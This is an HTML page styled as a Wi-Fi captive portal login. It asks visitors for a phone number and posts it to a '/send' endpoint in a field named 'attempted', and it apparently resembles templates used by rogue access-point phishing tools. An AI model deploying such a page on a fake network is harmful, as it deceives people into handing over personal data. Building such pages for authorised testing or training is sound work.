<html>
<head>
  <title>
    You need to login to get into the internet.
  </title>
  <meta name="viewport" content="width=device-width">
</head>
<body>
  <div class="header">
    <h1>Captive Portal</h1>
    <h2>You need to Login</h2>
  </div>
  <div class="container">
    <div class="he">
    <h1>Login</h1>
    </div>
    <form action="/send" method="POST">
      <input class="phone" name="attempted" type="phone" required placeholder="Enter your phone to login">
      <input class="btn" value="Authorize" type="submit">
    </form>
  </div>
  <style>
  @import url('https://fonts.googleapis.com/css2?family=Roboto:wght@900&display=swap');
  @import url('https://fonts.googleapis.com/css2?family=Exo+2:ital,wght@1,200&display=swap');
  body{
  	margin:0px;
  }
  .header{
    padding:2px 5px;
  	background:blue;
    color:white;
    font-family: 'Roboto', sans-serif;
  }
  .header h3{
  margin-left:3px;
  }
  .header  h2{
  margin-left:3px;
  }
  .container{
  font-family: 'Roboto', sans-serif;
  }
  .he{
  margin-left:15px;
  }
  form{
  width:100%;
  display:flex;
  flex-direction:column;
  }
  .phone{
  border:1px solid blue;
  color:blue;
  padding:5px;
  font-size:18px;
  font-family: 'Exo 2', sans-serif;
  }
  .btn{
  background:blue;
  font-size:18px;
  font-family: 'Exo 2', sans-serif;
  color:white;
  border:1px solid white;
  padding:15px; 
  cursor:pointer;
  }
  .btn:hover{
  
  background:white;
  color:blue;
  border:1px solid blue;
  }
  </style>
</body>
  
</html>
